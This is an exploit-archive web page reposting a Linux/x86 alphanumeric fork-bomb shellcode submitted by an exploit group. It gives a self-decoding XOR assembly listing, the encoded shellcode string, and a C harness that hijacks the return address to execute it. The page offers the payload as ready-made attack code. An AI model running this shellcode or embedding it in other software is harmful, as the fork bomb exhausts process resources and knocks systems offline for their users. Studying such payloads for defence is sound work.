Exploit the possiblities

Linux/x86 Alphanumeric Bomb FORK Shellcode

Linux/x86 Alphanumeric Bomb FORK Shellcode
Posted May 27, 2010
Authored by agix

117 bytes small Linux/x86 alphanumeric forkbomb shellcode.

tags | x86, shellcode
systems | linux
MD5 | 4120f2a508194f4f446b526d7e775e33

Linux/x86 Alphanumeric Bomb FORK Shellcode

Change Mirror Download
====================================================
linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
====================================================


/*
| Title: Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
| Type: Shellcode
| Author: agix
| Platform: Linux X86
*/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################## 1
0 I'm agix member from Inj3ct0r Team 1
1 ################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


/*
dec esp
dec esp
dec esp
dec esp
push dword 0x58494741
pop eax
xor eax, 0x58494741
dec eax
pop edx
push esp
pop ecx
push eax
push ecx
push edx
push eax
push esp
push ebp
push edx
push edi
popad
dec ecx
push dword 0x45525649
dec ecx
xor [ecx], bh
push word 0x5445
pop dx
xor [ecx], dh
dec ecx
xor [ecx], bh
push word 0x4255
pop dx
xor[ecx], dh
dec ecx
xor [ecx], bh
push word 0x3636
pop dx
xor [ecx], dh
dec ecx
push dword 0x6b6e756a
xor [ecx], bh
push word 0x5974
pop dx
xor [ecx], dh
dec ecx
push word 0x3636
pop dx
xor [ecx], dh
dec ecx
push word 0x776F
pop dx
xor [ecx], dh
push esp
push esi
pop ecx
xor [ecx + 116], bh
push word 0x7065
pop dx
xor [ecx + 116], dh
dec esp
*/


#include <stdio.h>

char shellcode[] =
"LLLLhAGIXX5AGIXHZTYPQRPTURWaIhIVREI09fhETfZ01I09fhUBfZ01I09fh66fZ01Ihjunk09fhtYfZ01Ifh66fZ01IfhowfZ01TVY0ytfhepfZ0qtL";


int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close